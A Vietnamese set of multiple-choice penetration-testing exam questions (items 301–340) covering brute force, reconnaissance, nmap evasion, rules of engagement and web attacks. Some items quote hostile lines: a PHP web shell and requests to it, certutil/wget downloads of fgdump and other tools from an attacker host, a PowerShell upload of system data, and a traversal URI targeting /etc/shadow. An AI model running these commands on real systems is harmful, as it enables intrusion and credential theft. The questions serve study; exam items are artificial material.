Câu 301:
Một chuyên gia kiểm tra thâm nhập đang thực hiện đánh giá trên 192.168.1.112. Kết quả thu được như sau:
[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"
[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"
[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"
[ATTEMPT] target 192.168.1.112 - login "root" - pass "tyuio"
Chuyên gia kiểm tra thâm nhập đang thực hiện hành động nào sau đây?
A. Quét cổng
B. Tấn công vét cạn (Brute-force)
C. Nhồi thông tin đăng nhập (Credential stuffing)
D. Tấn công từ chối dịch vụ (DoS)
Câu 302:
Trong quá trình trinh sát thụ động cơ sở hạ tầng của một tổ chức mục tiêu, một chuyên gia kiểm tra thâm nhập muốn xác định các liên hệ chính và trách nhiệm công việc trong công ty. Kỹ thuật nào sau đây sẽ hiệu quả nhất cho tình huống này?
A. Cạo thông tin mạng xã hội (Social media scraping)
B. Lưu trữ và lưu vào bộ nhớ đệm trang web (Website archive and caching)
C. Tra cứu DNS (DNS lookup)
D. Phân tích siêu dữ liệu tệp (File metadata analysis)
Câu 303:
Một chuyên gia kiểm tra thâm nhập đã viết đoạn mã Bash sau để vét cạn mật khẩu của một dịch vụ cục bộ:
#!/bin/bash
for p in $(cat wordlist.txt); do
echo $p | nc -u 127.0.0.1 20000 | grep "Wrong Password" & (echo "The correct password is $p" && break)
done
Đoạn mã không hoạt động như mong đợi. Chuyên gia kiểm tra thâm nhập nên thay đổi nào sau đây để đoạn mã hoạt động?
A. Thay thế
& (echo “The correct password is $p” && break )
bằng
&& echo “The correct password is $p” || break
B. Thay thế
& (echo “The correct password is $p” && break )
bằng
& echo “The correct password is $p” | break
C. Thay thế
& (echo “The correct password is $p” && break )
bằng
&& (echo “The correct password is $p” && break )
D. Thay thế
& (echo “The correct password is $p” && break )
bằng
|| ( echo “The correct password is $p” && break )
Câu 304:
Tài liệu nào sau đây sẽ hữu ích nhất trong việc xác định ai là người có lỗi đối với sự cố gián đoạn tạm thời xảy ra trong quá trình kiểm tra thâm nhập?
A. Thỏa thuận không tiết lộ (Non-disclosure agreement)
B. Thỏa thuận cộng tác kinh doanh (Business associate agreement)
C. Phạm vi đánh giá và phương pháp luận (Assessment scope and methodologies)
D. Tóm tắt điều hành (Executive summary)
Câu 305:
Một chuyên gia kiểm tra thâm nhập phát hiện ra mật khẩu trong một vụ rò rỉ dữ liệu công khai trong giai đoạn trinh sát của bài kiểm tra thâm nhập. Hành động tốt nhất mà chuyên gia kiểm tra nên thực hiện là gì?
A. Thêm mật khẩu vào phần phụ lục trong báo cáo kiểm tra thâm nhập.
B. Không làm gì cả. Sử dụng mật khẩu từ dữ liệu bị rò rỉ là phi đạo đức.
C. Liên hệ với khách hàng và thông báo cho họ về vụ rò rỉ.
D. Sử dụng mật khẩu trong một cuộc tấn công nhồi thông tin đăng nhập khi bắt đầu kiểm tra thâm nhập bên ngoài.
Câu 306:
Một chuyên gia kiểm tra thâm nhập đang cố gắng vượt qua một công cụ phản hồi chủ động chặn các địa chỉ IP có hơn 100 kết nối mỗi phút. Lệnh nào sau đây sẽ cho phép chuyên gia kiểm tra hoàn thành bài kiểm tra mà không bị chặn?
A. nmap -sU -p 1-1024 10.0.0.15
B. nmap -p 22,25,80,3389 -T2 10.0.0.15 -Pn
C. nmap -T5 -p 1-65535 -A 10.0.0.15
D. nmap -T3 -F 10.0.0.15
Câu 307:
Một chuyên gia kiểm tra thâm nhập chạy lệnh sau trên một hệ thống:
find / -user root -perm -4000 -print 2>/dev/null
Chuyên gia kiểm tra đang cố gắng thực hiện điều gì sau đây?
A. Đặt SGID trên tất cả các tệp trong thư mục /.
B. Tìm thư mục /root trên hệ thống.
C. Tìm các tệp có bit SUID được đặt.
D. Tìm các tệp được tạo trong quá trình khai thác và di chuyển chúng đến /dev/null.
Câu 308:
Công cụ nào sau đây cung cấp các lớp Python để tương tác với các giao thức mạng?
A. Responder
B. Impacket
C. Empire
D. PowerSploit
Câu 309:
Một kỹ sư an ninh đang cố gắng vượt qua IPS mạng cô lập nguồn khi quét vượt quá 100 gói tin mỗi phút. Phạm vi của quét là xác định máy chủ web trong mạng con 10.0.0.0/16. Kỹ sư nên sử dụng lệnh nào sau đây để đạt được mục tiêu trong thời gian ngắn nhất?
A. nmap -T3 -p 80 10.0.0.0/16 –max-hostgroup 100
B. nmap -T0 -p 80 10.0.0.0/16
C. nmap -T4 -p 80 10.0.0.0/16 –max-rate 60
D. nmap -T5 -p 80 10.0.0.0/16 –min-rate 80
Câu 310:
Một chuyên gia kiểm tra thâm nhập đang thực hiện kiểm tra thâm nhập kỹ thuật xã hội và có thể tạo phiên từ xa. Kỹ thuật kỹ thuật xã hội nào sau đây có khả năng thành công nhất?
A. Lừa đảo qua SMS (SMS phishing)
B. Mò mẫm thùng rác (Dumpster diving)
C. Tấn công mạo danh lãnh đạo (Executive impersonation attack)
D. Khung khai thác trình duyệt (Browser exploitation framework)
Câu 311:
Một chuyên gia kiểm tra thâm nhập đã yêu cầu, mà không có sự cho phép rõ ràng, một số CVE được gán cho một lỗ hổng mới được tìm thấy trên một ứng dụng khách hàng nội bộ. Chuyên gia kiểm tra thâm nhập có thể đã vi phạm điều nào sau đây?
A. ROE (Quy tắc giao chiến)
B. SLA (Thỏa thuận mức dịch vụ)
C. NDA (Thỏa thuận không tiết lộ)
D. SOW (Bản mô tả công việc)
Câu 312:
Một chuyên gia kiểm tra thâm nhập đang thực hiện một giao dịch cho một công ty và đã xác định được một ứng dụng web dễ bị tấn công. Trong giai đoạn trinh sát, chuyên gia kiểm tra phát hiện ra rằng ứng dụng web nội bộ chứa các thành phần hết hạn sử dụng. Bước tiếp theo phù hợp nhất là gì?
A. Báo cáo lỗ hổng cho bộ phận CNTT của công ty và cung cấp cho bộ phận thông tin chi tiết để vá ứng dụng
B. Thực hiện tấn công brute-force vào trang đăng nhập của ứng dụng web để kiểm tra độ mạnh của mật khẩu người dùng
C. Khởi chạy tấn công từ chối dịch vụ chống lại ứng dụng web để phá vỡ tính khả dụng của nó và lộ ra các lỗ hổng tiềm ẩn
D. Khai thác lỗ hổng để có quyền truy cập vào hệ thống back-end của ứng dụng web
Câu 313:
Các hoạt động kiểm tra thâm nhập đã kết thúc và các phát hiện ban đầu đã được xem xét với khách hàng. Bước TIẾP THEO nào sau đây mô tả tốt nhất trong giao dịch?
A. Thực hiện một buổi trình diễn trực tiếp kết quả cho quản trị viên hệ thống
B. Lên lịch các hành động tiếp theo và kiểm tra lại
C. Chứng thực các phát hiện và cung cấp báo cáo
D. Xem xét các bài học kinh nghiệm trong quá trình giao dịch
Câu 314:
Một chuyên gia kiểm tra thâm nhập đã tiến hành quét khám phá tạo ra kết quả sau:
Starting nmap 6.40 (http://nmap.org) at 2012-02-01 13:56 CST
Nmap scan report for 192.168.0.1
Host is up (0.21s latency).
Nmap scan report for 192.168.0.140
Host is up (0.30s latency).
Nmap scan report for 192.168.0.149
Host is up (0.020s latency).
Nmap scan report for 192.168.0.184
Host is up (0.0017s latency).
Nmap done: IP addresses (4 hosts up) scanned in 37.26 seconds
Lệnh nào sau đây đã tạo ra kết quả ở trên và sẽ chuyển đổi chúng thành danh sách các máy chủ hoạt động để phân tích thêm?
A. nmap -oG list.txt 192.168.0.1-254 | sort
B. nmap -sn 192.168.0.1-254 | grep “Nmap scan” | awk ‘{print $5}’
C. nmap -open 192.168.0.1-254 | uniq | sed ‘s/Nmap//2’ > file.txt
D. nmap -O 192.168.0.1-254 | cut -f
Câu 315:
Một chuyên gia kiểm tra đội đỏ đã được ký hợp đồng để mô phỏng mối đe dọa do một người nội bộ độc hại gây ra trên mạng của công ty, với mục tiêu bị hạn chế là có quyền truy cập vào các tệp nhân sự nhạy cảm. Trong quá trình đánh giá, chuyên gia kiểm tra đội đỏ xác định được một hiện vật cho thấy khả năng xâm nhập trước đó trong môi trường mục tiêu. Chuyên gia kiểm tra nên thực hiện hành động nào sau đây?
A. Thực hiện phân tích pháp y để phân lập phương tiện xâm nhập và xác định thuộc tính.
B. Kết hợp phương pháp xâm nhập mới được xác định vào cách tiếp cận của đội đỏ.
C. Tạo một tài liệu chi tiết về các phát hiện trước khi tiếp tục đánh giá.
D. Dừng đánh giá và làm theo các quy trình báo cáo được nêu trong hợp đồng.
Câu 316:
Một chuyên gia kiểm tra thâm nhập đã xác định nhiều lỗ hổng có thể dẫn đến việc sửa đổi trái phép dữ liệu quan trọng. Chuyên gia kiểm tra thâm nhập nên đề xuất điều nào sau đây là tốt nhất?
A. Truy cập phẳng (Flat access)
B. Kiểm soát truy cập dựa trên vai trò (Role-based access control)
C. Kiểm soát truy cập dựa trên quyền (Permission-based access control)
D. Mô hình kiểm soát dựa trên nhóm (Group-based control model)
Câu 317:
Công cụ nào sau đây là tốt nhất để sử dụng để chặn phản hồi HTTP của API, thay đổi nội dung của nó và chuyển tiếp nó trở lại thiết bị di động gốc?
A. Drozer
B. Burp Suite
C. Android SDK Tools
D. MobSF
Câu 318:
Một chuyên gia kiểm tra thâm nhập đang tiến hành kiểm tra sau giờ làm việc và nhận thấy một hệ thống quan trọng đã bị ngừng hoạt động. Liên hệ nào sau đây nên được thông báo trước tiên?
A. Thứ cấp (Secondary)
B. Khẩn cấp (Emergency)
C. Kỹ thuật (Technical)
D. Chính (Primary)
Câu 319:
Một chuyên gia kiểm tra thâm nhập muốn thực hiện trinh sát mà không bị phát hiện. Hoạt động nào sau đây có khả năng bị phát hiện tối thiểu? (Chọn hai)
A. Nghiên cứu nguồn mở (Open-source research)
B. Quét ping (Ping sweep)
C. Đánh hơi lưu lượng (Traffic sniffing)
D. Gõ cửa (Port knocking)
E. Quét lỗ hổng (Vulnerability scan)
F. Quét Nmap (Nmap scan)
Câu 320:
Trong quá trình đánh giá, một chuyên gia kiểm tra thâm nhập đã tìm thấy một tập lệnh đáng ngờ có thể cho thấy sự xâm nhập trước đó. Trong khi đọc tập lệnh, chuyên gia kiểm tra thâm nhập nhận thấy các dòng mã sau:
import subprocess
subprocess.call("ifconfig eth0 down", shell=True)
subprocess.call("ifconfig eth0 hw ether 2a:33:41:56:21:34", shell=True)
subprocess.call("ifconfig eth0 up", shell=True)
Tác giả tập lệnh đã cố gắng làm gì sau đây?
A. Tạo một shell cục bộ.
B. Vô hiệu hóa NIC.
C. Liệt kê các quy trình.
D. Thay đổi địa chỉ MAC.
Câu 321:
Trong một bài đánh giá, một chuyên gia kiểm tra thâm nhập đã tìm thấy một thành phần web không có yêu cầu xác thực. Thành phần web này cũng cho phép tải lên tệp và được lưu trữ trên một trong các máy chủ web công khai mục tiêu. Chuyên gia kiểm tra thâm nhập nên thực hiện hành động nào sau đây tiếp theo?
A. Tiếp tục đánh giá và đánh dấu phát hiện là nghiêm trọng.
B. Cố gắng khắc phục sự cố tạm thời.
C. Thông báo ngay lập tức cho người liên hệ chính.
D. Tắt máy chủ web cho đến khi hoàn thành đánh giá.
Câu 322:
Trong một bài đánh giá, một chuyên gia kiểm tra thâm nhập có được danh sách các bản tóm tắt mật khẩu bằng cách sử dụng Responder. Chuyên gia kiểm tra thâm nhập có thể sẽ sử dụng công cụ nào sau đây tiếp theo?
A. Hashcat
B. Hydra
C. CeWL
D. Medusa
Câu 323:
Một chuyên gia kiểm tra thâm nhập đang thực hiện quét lỗ hổng trên mạng ATM lớn. Một trong những yêu cầu của tổ chức là việc quét không ảnh hưởng đến việc sử dụng ATM của khách hàng hợp pháp. Chuyên gia kiểm tra nên làm gì sau đây để đáp ứng tốt nhất các yêu cầu quét lỗ hổng của công ty?
A. Sử dụng tùy chọn -T2 của Nmap để chạy quét chậm hơn và ít tài nguyên hơn.
B. Chạy quét bằng nhiều máy.
C. Chỉ chạy quét trong giờ ăn trưa.
D. Sử dụng tùy chọn –host-timeout của Nmap để bỏ qua các mục tiêu không phản hồi.
Câu 324:
Một chuyên gia kiểm tra thâm nhập đã có được shell quyền thấp trên máy chủ Windows với cấu hình mặc định và bây giờ muốn khám phá khả năng khai thác các quyền dịch vụ được cấu hình sai. Lệnh nào sau đây sẽ giúp chuyên gia kiểm tra bắt đầu quy trình này?
A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Câu 325:
Một chuyên gia kiểm tra thâm nhập đưa ra lệnh sau sau khi có được shell:
certutil -urlcache -split -f http://192.168.119.134/fgdump.exe fgdump.exe
Điều nào sau đây mô tả kỹ thuật này?
A. Thiết lập backdoor
B. Nâng cao đặc quyền
C. PowerShell remoting
D. Living-off-the-land (Sống nhờ đất)
Câu 326:
Một chuyên gia kiểm tra thâm nhập quan sát thấy một ứng dụng thực thi kiểm soát truy cập nghiêm ngặt. Điều nào sau đây sẽ cho phép chuyên gia kiểm tra bỏ qua các điều khiển này và truy cập thành công các tệp nhạy cảm của tổ chức?
A. Remote File Inclusion (RFI)
B. Cross-Site Scripting (XSS)
C. SQL Injection
D. Insecure Direct Object References (IDOR)
Câu 327:
Trong khi tiến hành kiểm tra thâm nhập một ứng dụng web, chuyên gia kiểm tra thâm nhập nhập URI sau:
http://test.comptia.com/../../../../etc/shadow
Chuyên gia kiểm tra đang cố gắng thực hiện cuộc tấn công nào sau đây?
A. XML injection
B. SQL injection
C. Directory Traversal
D. Buffer Overflow
Câu 328:
Một công ty kiểm tra thâm nhập muốn thuê ba chuyên gia tư vấn bổ sung để hỗ trợ hợp đồng dài hạn mới được ký kết với một khách hàng lớn. Sau đây là tóm tắt về kiểm tra lý lịch của ứng viên:
Số ứng viên | Hồ sơ hình sự |
Ứng viên 1 | Say xỉn nơi công cộng |
Ứng viên 2 | Truy cập trái phép hệ thống |
Ứng viên 3 | Không có |
Ứng viên 4 | Vượt tốc độ trong khu vực xây dựng |
Ứng viên nào sau đây có nhiều khả năng BỊ loại khỏi danh sách xem xét?
A. Ứng viên 1
B. Ứng viên 2
C. Ứng viên 3
D. Ứng viên 4
Câu 329:
Điều nào sau đây là thành phần ROE cung cấp cho chuyên gia kiểm tra thâm nhập hướng dẫn về ai và cách liên hệ với các cá nhân cần thiết trong trường hợp xảy ra sự cố trong quá trình tham gia?
A. Phạm vi tham gia
B. Đường dẫn leo thang giao tiếp
C. SLA
D. SOW
Câu 330:
Đưa ra đoạn mã Bash sau:
#!/bin/bash
url="http://10.10.10.1:8888"
for i in {1..10}; do
for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.doc"); do
wget -q $url/$link
done
done
Điều nào sau đây sẽ đạt được?
A. Liệt kê người dùng
B. Tấn công brute-force thư mục
C. Quét cổng
D. Tải xuống tệp
Câu 331:
Cho dữ liệu do người dùng cung cấp sau:
www.comptia.com/info.php?id=1 AND 1=1
Kỹ thuật tấn công nào sau đây mà chuyên gia kiểm tra thâm nhập có thể đang thực hiện?
A. SQL Injection dựa trên Boolean
B. SQL Injection dựa trên thời gian
C. Cross-site scripting được lưu trữ
D. Cross-site scripting được phản xạ
Câu 332:
Một chuyên gia kiểm tra thâm nhập đang chụp ảnh màn hình các hàm băm thu được từ bộ điều khiển miền. Điều nào sau đây giải thích TỐT NHẤT lý do tại sao chuyên gia kiểm tra thâm nhập nên che ngay các phần của hình ảnh trước khi lưu?
A. Để duy trì tính bảo mật của dữ liệu/thông tin
B. Để tránh tiết lộ cách thức thu được các hàm băm
C. Để làm cho các hàm băm xuất hiện ngắn hơn và dễ bẻ khóa hơn
D. Để ngăn chặn việc phân tích dựa trên loại hàm băm
Câu 333:
Công cụ nào sau đây mà chuyên gia kiểm tra thâm nhập có thể sử dụng để tấn công brute-force mật khẩu người dùng qua SSH bằng nhiều luồng?
A. CeWL
B. John the Ripper
C. Hashcat
D. Hydra
Câu 334:
Đưa ra đoạn mã sau:
$p = (80, 110, 25)
$network = (192.168.0)
$range = 1..254
$ErrorActionPreference = 'silentlycontinue'
$Foreach ($add in $range) {
$Foreach ($x in $p) {
{$ip = "{0}.{1}" -F $network, $add}
If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip) {
$socket = new-object System.Net.Sockets.TcpClient($ip, $x)
If ($socket.Connected) {$ip $p open"}
$socket.Close()
}
}
}
Nhiệm vụ nào sau đây có thể được thực hiện bằng tập lệnh?
A. Reverse shell
B. Quét Ping
C. Tải tệp xuống
D. Quét cổng
Câu 335:
Công cụ nào sau đây sẽ giúp chuyên gia kiểm tra thâm nhập định vị tệp đã được tải lên hệ thống quản lý nội dung?
A. DirBuster
B. OpenVAS
C. Scout Suite
D. CeWL
Câu 336:
Một chuyên gia kiểm tra thâm nhập thực hiện fuzzing trên một máy chủ nội bộ để tìm kiếm các dịch vụ và ứng dụng ẩn và thu được kết quả sau:
Status: 200, Size 2463, Words: 240, Lines: 45 URL: http://10.200.35.14/admin
Status: 200, Size 2463, Words: 240, Lines: 45 URL: http://10.200.35.14/db
Status: 403, Size 437, Words: 12, Lines: 4 URL: http://10.200.35.14/server-status
Status: 200, Size 2463, Words: 240, Lines: 45 URL: http://10.200.35.14/login
Status: 200, Size 2463, Words: 240, Lines: 45 URL: http://10.200.35.14/test
Status: 404, Size , Words: 18, Lines: 6 URL: http://10.200.35.14/robots.txt
Lời giải thích NÀO sau đây CÓ KHẢ NĂNG NHẤT cho kết quả đầu ra?
A. Chuyên gia kiểm tra không sử dụng chứng chỉ SSL hợp lệ.
B. Không thể fuzzing thư mục admin vì nó bị cấm.
C. Các thư mục admin, test và db chuyển hướng đến trang đăng nhập.
D. Tệp robots.txt có sáu mục trong đó.
Câu 337: (Câu hỏi Simulation – cần ngữ cảnh bổ sung)
Câu 338:
Một chuyên gia kiểm tra thâm nhập được thuê để kiểm tra thiết bị Wi-Fi. Công cụ nào sau đây nên được sử dụng để thu thập thông tin về mạng không dây?
A. Kismet
B. Burp Suite
C. BeEF
D. WHOIS
Câu 339:
Trong một cuộc kiểm tra thâm nhập, một chuyên gia đã có thể tải lên máy chủ một tệp PHP với nội dung sau:
<?php system($_POST['cmd']); ?>
Lệnh nào sau đây chuyên gia kiểm tra thâm nhập nên chạy để đạt được RCE thành công?
A. python3 -c “import requests;print(requests.post(url=’http://172.16.200.10/uploads/shell.php’,data={‘cmd’:’id’}))”
B. python3 -c “import requests;print(requests.post(url=’http://172.16.200.10/uploads/shell.php’,data={‘cmd’: ‘id’}).text)”
C. python3 -c “import requests;print(requests.get(url=’http://172.16.200.10/uploads/shell.php’,params={‘cmd’: ‘id’}))”
D. python3 -c “import requests;print(requests.get(url=’http://172.16.200.10/uploads/shell.php’,params={‘cmd’: ‘id’}).test)”
Câu 340:
Một chuyên gia kiểm tra thâm nhập đã phát hiện ra một kho mã và nhận thấy mật khẩu đã được băm trước khi chúng được lưu trữ trong cơ sở dữ liệu với mã sau:
salt = 'salt123'
hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000)
Chuyên gia kiểm tra thâm nhập đã đề xuất cập nhật mã thành như sau:
salt = os.urandom(32)
hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000)
Chuyên gia kiểm tra thâm nhập nên đề xuất bước nào sau đây?
A. Thay đổi mật khẩu đã được tạo trước khi cập nhật mã này
B. Lưu trữ băm được tạo bởi cả hai phương pháp để tương thích
C. Băm lại tất cả mật khẩu cũ bằng mã mới
D. Cập nhật thuật toán SHA-256 thành một thứ gì đó an toàn hơn.
Để lại một bình luận